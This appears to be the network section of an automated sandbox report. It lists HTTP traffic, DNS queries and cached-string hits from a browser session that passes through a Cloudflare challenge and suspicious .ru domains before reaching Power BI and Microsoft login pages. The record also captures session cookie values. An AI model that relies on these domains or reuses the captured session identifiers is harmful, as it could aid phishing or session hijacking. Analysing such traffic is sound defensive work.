Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8f0940fe6c4f4373/1733959740242/qZT9_F68n3xQwRy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8f0940fe6c4f4373/1733959740242/qZT9_F68n3xQwRy HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSC HTTP/1.1Host: mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://21.zomelore.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://21.zomelore.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /injqzmaorhcfcmoaukflhkifyNZxGCKNYHHPPVNBFPELBOVUYIFNOCEPIRMUSC HTTP/1.1Host: mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?pbi_source=websignup_uNav HTTP/1.1Host: app.powerbi.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1 HTTP/1.1Host: app.powerbi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://app.powerbi.com/?pbi_source=websignup_uNavAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560
Source: global trafficHTTP traffic detected: GET /13.0.24766.39/scripts/hash-manifest.js HTTP/1.1Host: app.powerbi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560
Source: global trafficHTTP traffic detected: GET /13.0.24766.39/scripts/hash-manifest.js HTTP/1.1Host: app.powerbi.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560
Source: global trafficHTTP traffic detected: GET /13.0.24766.39/images/PowerBI_MasterLogo.svg HTTP/1.1Host: app.powerbi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: objectReferer: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ai_user=2kQWAod7KlEqEF58e20SmV|2024-12-11T23:30:09.794Z; ai_session=5euVcVh3S9yhv4eHm/fvHb|1733959809798|1733959809798
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: app.powerbi.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.powerbi.com/singleSignOn?pbi_source=websignup_uNav&ru=https%3A%2F%2Fapp.powerbi.com%2F%3Fpbi_source%3Dwebsignup_uNav%26noSignUpCheck%3D1Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ASP.NET_SessionId=d4pjdp40z2qspls5d0ihxuuc; WFESessionId=0ea902de-85be-4d50-88a2-e7c977445e74; EnableCSP=PROD; ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ai_user=2kQWAod7KlEqEF58e20SmV|2024-12-11T23:30:09.794Z; ai_session=5euVcVh3S9yhv4eHm/fvHb|1733959809798|1733959809798
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: app.powerbi.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ai_user=2kQWAod7KlEqEF58e20SmV|2024-12-11T23:30:09.794Z; ai_session=5euVcVh3S9yhv4eHm/fvHb|1733959809798|1733959809798
Source: chromecache_280.2.dr, chromecache_291.2.drString found in binary or memory: </svg>`;function EW(a,s){return l=>{const p=AW(l).map(f=>CW(f));s.setValue({...s.value,shareOptions:p});function d(){s.setValue({...s.value,shareDialogOpened:!0})}function m(){var f,E,I,D,N,O;s.setValue({...s.value,shareDialogOpened:!1}),(O=(N=(D=(I=(E=(f=a.renderRoot)==null?void 0:f.querySelector("ump-controls"))==null?void 0:E.renderRoot.querySelector("ump-control-bar"))==null?void 0:I.renderRoot.querySelector("ump-more-menu"))==null?void 0:D.renderRoot.querySelector('[data-id="more-menu-button"]'))==null?void 0:N.focus)==null||O.call(N)}const y=Hh(a);return y.addEventListener("share-button-clicked",d),y.addEventListener("share-dialog-closed",m),()=>{y.removeAllListeners()}}}function AW(a){return a.options.share?a.options.shareOptions.length===0?wM:a.options.shareOptions:[]}function CW(a){const s=new URL(window.location.href);s.searchParams.delete("jsapi");const l=s.toString();switch(a){case"facebook":return{id:"facebook",url:`https://www.facebook.com/share.php?u=${encodeURIComponent(l)}`,icon:SW};case"linkedin":return{id:"linkedin",url:`https://www.linkedin.com/shareArticle?mini=true&url=${encodeURIComponent(l)}&title=&summary=&source=`,icon:TW};case"twitter":return{id:"twitter",url:`https://x.com/share?url=${encodeURIComponent(l)}&text=`,icon:kW};case"mail":return{id:"mail",url:`mailto:?subject=Check out this great video&body=${encodeURIComponent(l)}`,icon:xW};default:return{id:"copy",url:l,icon:""}}}function IW(){return a=>{if(a.options.sources.length===0)return()=>{};a.addEventListener("loadsourcesrequest",s);async function s(){a.dispatchEvent(new jt.util.FakeEvent("playerloadmediastart"));const l=lg(a.options.sources);try{await a.load(l[0].src,a.options.startTime,l[0].type)}catch{a.dispatchShakaError(jt.util.Error.Severity.CRITICAL,jt.util.Error.Category.MEDIA,jt.util.Error.Code.MEDIA_SOURCE_OPERATION_FAILED);return}await a.loadCaptions(),a.dispatchEvent(new jt.util.FakeEvent("playerloadmediaend")),a.dispatchEvent(new jt.util.FakeEvent("loadsourcescomplete"))}return()=>{}}}function MW(){try{return crypto.randomUUID()}catch{return`10000000-1000-4000-8000-${1e11}`.replace(/[018]/g,a=>(a^crypto.getRandomValues(new Uint8Array(1))[0]&15>>a/4).toString(16))}}var _W=Object.defineProperty,PW=Object.getOwnPropertyDescriptor,cg=(a,s,l,p)=>{for(var d=p>1?void 0:p?PW(s,l):s,m=a.length-1,y;m>=0;m--)(y=a[m])&&(d=(p?y(s,l,d):y(d))||d);return p&&d&&_W(s,l,d),d};jt.polyfill.installAll();const i3="options";function a3(a,s,l){const p=a instanceof $a?a:$a.getById(a);return l&&p.addEventListener("ready",l,{once:!0}),p.setAttribute("options",JSON.stringify(s)),p}Object.defineProperty(a3,"allowAutoplay",{get:PL,set:QX});let $a=class extends Cn{constructor(){super(...arguments),this.umpId=`ump-${MW()}`,this.ariaLabel=null,this.playerStateContext=new Rw(this,{context:mr,initialValue:xM}),this.onVideoEvent=a=>{this.dispatchEvent(new kt(a.type,a.target))}}render(){return ht` equals www.facebook.com (Facebook)
Source: chromecache_280.2.dr, chromecache_291.2.drString found in binary or memory: </svg>`;function EW(a,s){return l=>{const p=AW(l).map(f=>CW(f));s.setValue({...s.value,shareOptions:p});function d(){s.setValue({...s.value,shareDialogOpened:!0})}function m(){var f,E,I,D,N,O;s.setValue({...s.value,shareDialogOpened:!1}),(O=(N=(D=(I=(E=(f=a.renderRoot)==null?void 0:f.querySelector("ump-controls"))==null?void 0:E.renderRoot.querySelector("ump-control-bar"))==null?void 0:I.renderRoot.querySelector("ump-more-menu"))==null?void 0:D.renderRoot.querySelector('[data-id="more-menu-button"]'))==null?void 0:N.focus)==null||O.call(N)}const y=Hh(a);return y.addEventListener("share-button-clicked",d),y.addEventListener("share-dialog-closed",m),()=>{y.removeAllListeners()}}}function AW(a){return a.options.share?a.options.shareOptions.length===0?wM:a.options.shareOptions:[]}function CW(a){const s=new URL(window.location.href);s.searchParams.delete("jsapi");const l=s.toString();switch(a){case"facebook":return{id:"facebook",url:`https://www.facebook.com/share.php?u=${encodeURIComponent(l)}`,icon:SW};case"linkedin":return{id:"linkedin",url:`https://www.linkedin.com/shareArticle?mini=true&url=${encodeURIComponent(l)}&title=&summary=&source=`,icon:TW};case"twitter":return{id:"twitter",url:`https://x.com/share?url=${encodeURIComponent(l)}&text=`,icon:kW};case"mail":return{id:"mail",url:`mailto:?subject=Check out this great video&body=${encodeURIComponent(l)}`,icon:xW};default:return{id:"copy",url:l,icon:""}}}function IW(){return a=>{if(a.options.sources.length===0)return()=>{};a.addEventListener("loadsourcesrequest",s);async function s(){a.dispatchEvent(new jt.util.FakeEvent("playerloadmediastart"));const l=lg(a.options.sources);try{await a.load(l[0].src,a.options.startTime,l[0].type)}catch{a.dispatchShakaError(jt.util.Error.Severity.CRITICAL,jt.util.Error.Category.MEDIA,jt.util.Error.Code.MEDIA_SOURCE_OPERATION_FAILED);return}await a.loadCaptions(),a.dispatchEvent(new jt.util.FakeEvent("playerloadmediaend")),a.dispatchEvent(new jt.util.FakeEvent("loadsourcescomplete"))}return()=>{}}}function MW(){try{return crypto.randomUUID()}catch{return`10000000-1000-4000-8000-${1e11}`.replace(/[018]/g,a=>(a^crypto.getRandomValues(new Uint8Array(1))[0]&15>>a/4).toString(16))}}var _W=Object.defineProperty,PW=Object.getOwnPropertyDescriptor,cg=(a,s,l,p)=>{for(var d=p>1?void 0:p?PW(s,l):s,m=a.length-1,y;m>=0;m--)(y=a[m])&&(d=(p?y(s,l,d):y(d))||d);return p&&d&&_W(s,l,d),d};jt.polyfill.installAll();const i3="options";function a3(a,s,l){const p=a instanceof $a?a:$a.getById(a);return l&&p.addEventListener("ready",l,{once:!0}),p.setAttribute("options",JSON.stringify(s)),p}Object.defineProperty(a3,"allowAutoplay",{get:PL,set:QX});let $a=class extends Cn{constructor(){super(...arguments),this.umpId=`ump-${MW()}`,this.ariaLabel=null,this.playerStateContext=new Rw(this,{context:mr,initialValue:xM}),this.onVideoEvent=a=>{this.dispatchEvent(new kt(a.type,a.target))}}render(){return ht` equals www.linkedin.com (Linkedin)
Source: global trafficDNS traffic detected: DNS query: bookworkstudio.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: 21.zomelore.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: mbigqvptso9zh4kbsf1xwmhkf9pcroq3g0vbws0rgv5970xbtzluqzxc.bfcgpixdwnw.ru
Source: global trafficDNS traffic detected: DNS query: cdn.botframework.com
Source: global trafficDNS traffic detected: DNS query: play.vidyard.com
Source: global trafficDNS traffic detected: DNS query: app.powerbi.com
Source: global trafficDNS traffic detected: DNS query: api.powerbi.com
Source: global trafficDNS traffic detected: DNS query: content.powerapps.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: dc.services.visualstudio.com
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/2052973775:1733955903:mwgDOxztvG-5XDI8u3krRI0LqZnjx6ACV_1HL3xWCHg/8f0940fe6c4f4373/CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaL HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3220sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: CVmrfugbA_zqktzvG3JcRgs_mC_rv53iYzPMW._IILw-1733959736-1.1.1.1-UvbuVkQKEJNelwu1lbxWxXa26svM2baBo3khA2S2NQujCVwstPaAd55J9oE_yBaLsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/ahw4n/0x4AAAAAAA1QAANc6ALCga__/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:28:59 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xg3i%2F2DJOn9RrO%2FysZQ3HiAyoGL%2FSSgwNmx0epxf6oxUA2gyXkka%2BCmv7yfq%2BD7ZJsuOZpQeJbeDhfYcs0mPXYub5khf8ymrsIE4ttITO8U1bNu23GvWDb35Q4wwPg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1647&rtt_var=645&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2228&delivery_rate=2301650&cwnd=252&unsent_bytes=0&cid=7cf543b603d3b0b1&ts=296&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8f09410f4eb8428f-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1592&rtt_var=644&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=1894&delivery_rate=1834170&cwnd=83&unsent_bytes=0&cid=f1d978c3879e8fef&ts=9670&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:29:02 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: O5+HdyxD6IQBfBwlvjfNnnI8ZOYcVztNLNE=$6wmO6CYXDoJTHYylServer: cloudflareCF-RAY: 8f0941273f240f47-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:29:09 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: Mkj9qgeTaoqTS58wpCSCq7AJyMB+9Cwnt0o=$PuRSVuC3tSVHk0bhcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8f0941516e2d41ec-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 23:29:14 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: k0wU49qIs5WxesWNXGc+C7FQf8dSX5lz+lc=$M8gHkjVl41uGkya2Server: cloudflareCF-RAY: 8f0941726fdb726b-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_223.2.dr, chromecache_302.2.drString found in binary or memory: http://github.com/jquery/globalize
Source: chromecache_289.2.dr, chromecache_339.2.drString found in binary or memory: http://github.com/requirejs/almond/LICENSE
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://interactjs.io/docs/#autoscroll
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://interactjs.io/docs/#resize-square
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://interactjs.io/docs/inertia
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://interactjs.io/docs/restriction
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://interactjs.io/docs/snapping
Source: chromecache_223.2.dr, chromecache_302.2.dr, chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://jquery.org/license
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://jscompress.com/
Source: chromecache_202.2.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_268.2.dr, chromecache_320.2.drString found in binary or memory: http://scottjehl.github.io/picturefill
Source: chromecache_257.2.dr, chromecache_297.2.dr, chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://underscorejs.org/LICENSE
Source: chromecache_331.2.dr, chromecache_307.2.drString found in binary or memory: http://wiki.jqueryui.com/Globalize
Source: chromecache_228.2.dr, chromecache_219.2.drString found in binary or memory: http://windowsphone.com/s?appId=
Source: chromecache_328.2.dr, chromecache_263.2.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_202.2.drString found in binary or memory: https://aka.ms/PBI_Comm_Overview
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://aka.ms/contact-support
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://aka.ms/fabricibiza
Source: chromecache_202.2.drString found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_214.2.drString found in binary or memory: https://api.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://app.pbiwebcontent.com/webcontentsandbox.html
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://app.powerbi.com
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://arc.msn.com/v4
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: chromecache_213.2.dr, chromecache_324.2.drString found in binary or memory: https://axios-http.com
Source: chromecache_334.2.dr, chromecache_330.2.drString found in binary or memory: https://breeze.aimon.applicationinsights.io
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=12006
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://bugs.chromium.org/p/v8/issues/detail?id=3334
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://bugzil.la/548397
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=277178
Source: chromecache_205.2.dr, chromecache_206.2.drString found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=308064
Source: chromecache_350.2.dr, chromecache_260.2.drString found in binary or memory: https://cdn.jsdelivr.net/npm/bluebird
Source: chromecache_346.2.dr, chromecache_192.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/jquery-ui.min.54471b21b524931a54a1.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.globalize/globalize.culture.en-US.0
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.globalize/globalize.min.8e8ec43af69
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/jquery.min.c8e1c8b386dc5b7a9184.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/lodash.bundle.min.1f04f34657610a03812a.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/polyfills.min.b0ad25daead656e47c0a.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/require.min.c1195d49355cee73bd97.js
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/teamsTelemetry.bundle.min.34c9b7c9fab687ea
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/scripts/telemetry.bundle.min.5ac346bb7f2ce9638910.
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/InfoNav.Common.min.a2bd4024265b5d6e8c59.css
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/explorationContainer.min.df5c326d664e205192
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/powerBICommon.min.0a88a17616f1e34fa71c.css
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/powerBIProvidersCommon.min.000a70741198babf
Source: chromecache_303.2.dr, chromecache_214.2.drString found in binary or memory: https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.common.externals.min.45febe62502627
